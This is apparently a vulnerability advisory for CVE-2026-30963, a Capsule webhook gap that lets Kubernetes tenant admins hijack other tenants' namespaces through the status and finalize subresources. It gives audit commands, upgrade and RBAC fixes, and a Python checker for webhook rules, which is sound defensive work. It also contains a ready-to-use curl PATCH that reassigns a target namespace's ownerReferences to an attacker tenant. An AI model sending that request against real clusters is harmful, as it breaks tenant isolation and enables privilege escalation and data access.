Kubernetes (Capsule), Authorization Bypass, CVE-2026-30963 (Low) -DC-Jun2026-204


Intro: How CVE-2026-30963 Works:

Capsule, a Kubernetes multi-tenancy framework, uses a validating webhook to block namespace hijacking through standard update and patch operations on the namespace object. Kubernetes, however, also exposes two subresource endpoints for namespaces, `status` and `finalize`, and a write to either can modify the namespace's metadata, including its `ownerReferences`.

Prior to version 0.13.0, Capsule's ValidatingWebhookConfiguration had no rules matching these subresources, so any request sent to `/api/v1/namespaces/{namespace}/status` or `/api/v1/namespaces/{namespace}/finalize` bypasses the webhook's validation entirely. A malicious tenant administrator holding RBAC permission to patch these subresources can therefore rewrite a namespace's `ownerReferences`, reassigning ownership of that namespace (for example, from another tenant to their own) and taking control of namespaces they should not have access to, which breaks the multi-tenancy isolation Capsule is designed to enforce.

The fix in version 0.13.0 adds `namespaces/status` and `namespace/finalize` to the `resources` list in the ValidatingWebhookConfiguration, so the webhook logic is applied to all relevant API endpoints. Without this mitigation, any tenant with subresource patch permissions can perform namespace hijacking.

DailyCVE Form:

Platform: Kubernetes, Capsule
Version: 0.12.x and below
Vulnerability: Namespace hijacking
Severity: Low (CVSS 2.7/3.9)
Date: 2026-06-01

Prediction: 2026-06-01

What Undercode Say:

Audit the current ValidatingWebhookConfiguration for namespace rules that omit the subresources (the configuration name below is the one cited in this advisory; if it differs in your cluster, list them with `kubectl get validatingwebhookconfigurations` first):
kubectl get validatingwebhookconfiguration capsule-validating-webhook -o json | jq '.webhooks[] | {name, resources: [.rules[] | select(any(.resources[]; startswith("namespaces"))) | .resources[]]}'

Check which roles grant the permissions that enable the attack (the resource rules live in Roles and ClusterRoles, not in the bindings, and the `|` alternation needs extended regex, so the original `describe clusterrolebinding | grep` pipeline could not find them):
kubectl get clusterroles,roles -A -o json | jq -r '.items[] | select(any(.rules[]?.resources[]?; test("^namespaces?/(status|finalize)$"))) | "\(.kind)/\(.metadata.name)"'

Simulate the attack by patching the status subresource:
curl -k --cert attacker.crt --key attacker.key --request PATCH 'https://<API_SERVER>/api/v1/namespaces/target-namespace/status' \
--header 'Content-Type: application/json-patch+json' \
--data '[{"op":"replace","path":"/metadata/ownerReferences","value":[{"apiVersion":"capsule.clastix.io/v1beta2","kind":"Tenant","name":"attacker-tenant","uid":"<UID>"}]}]'

Exploit:

A tenant with `patch` permission on `namespaces/status` or `namespace/finalize` can issue a PATCH request to the vulnerable subresource, modifying the `ownerReferences` field to point to their own tenant. As the webhook does not inspect these subresources, the change is accepted, and the namespace is hijacked.

Protection:

  • Upgrade Capsule to version 0.13.0 or later.
  • If upgrading is not possible, manually patch the ValidatingWebhookConfiguration to include `namespaces/status` and `namespace/finalize` under the `resources` field.
  • Restrict RBAC permissions for `namespace/status` and `namespace/finalize` to only trusted users.
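As an added example (not part of this advisory and not Capsule's own code), the check below parses a ValidatingWebhookConfiguration, reports each namespace-validating webhook whose rules omit the status or finalize subresource, and produces the patched rule set described in the Intro and in the second Protection bullet. The webhook manifest is a constructed sample with an assumed name; the resource names use the plural `namespaces/<subresource>` form that Kubernetes webhook rules expect.

```python
import json

# Core-group resources a namespace-validating webhook must list: the object
# itself plus the two subresources through which metadata (ownerReferences
# included) can still be written. Kubernetes spells them "namespaces/<sub>".
REQUIRED = ("namespaces", "namespaces/status", "namespaces/finalize")

# Constructed sample, not Capsule's real manifest: a pre-0.13.0-style rule
# that only matches the main resource, leaving both subresources unvalidated.
SAMPLE_CONFIG = json.loads("""{
  "metadata": {"name": "example-validating-webhook"},
  "webhooks": [{"name": "namespaces.example.io", "rules": [
    {"apiGroups": [""], "apiVersions": ["v1"],
     "operations": ["CREATE", "UPDATE", "DELETE"], "resources": ["namespaces"]}]}]
}""")

def _namespace_coverage(rule):
    """REQUIRED entries one rule matches ("*" = resources only; "*/*" adds subresources)."""
    if not {"", "*"} & set(rule.get("apiGroups", [])):
        return set()  # namespaces live in the core ("") API group
    covered = set()
    for r in rule.get("resources", []):
        if r in ("*/*", "namespaces/*"):
            covered.update(REQUIRED)
        elif r == "*":
            covered.add("namespaces")
        elif r.startswith("*/"):  # e.g. "*/status" covers namespaces/status
            covered.add("namespaces/" + r[2:])
        elif r == "namespaces" or r.startswith("namespaces/"):
            covered.add(r)
    return covered & set(REQUIRED)

def find_gaps(config):
    """Map each webhook that validates namespaces to the REQUIRED entries it misses."""
    gaps = {}
    for wh in config.get("webhooks", []):
        covered = set().union(*(_namespace_coverage(r) for r in wh.get("rules", [])))
        missing = [r for r in REQUIRED if covered and r not in covered]
        if missing:
            gaps[wh["name"]] = missing
    return gaps

def add_subresources(config):
    """Return a copy in which every namespace rule also lists both subresources."""
    fixed = json.loads(json.dumps(config))
    for wh in fixed.get("webhooks", []):
        for rule in wh.get("rules", []):
            if "namespaces" in _namespace_coverage(rule):
                rule["resources"] += [r for r in REQUIRED if r not in rule["resources"]]
    return fixed
```

To run it against a live cluster, feed each item of `kubectl get validatingwebhookconfigurations -o json` to `find_gaps`; an empty result means every namespace rule already covers both subresources.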

Impact:

Successful exploitation allows a tenant administrator to take ownership of any namespace (including system namespaces) they have patch access to via subresources, breaking multi-tenancy isolation, enabling privilege escalation, and potentially leading to data leakage or cross-tenant resource access.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
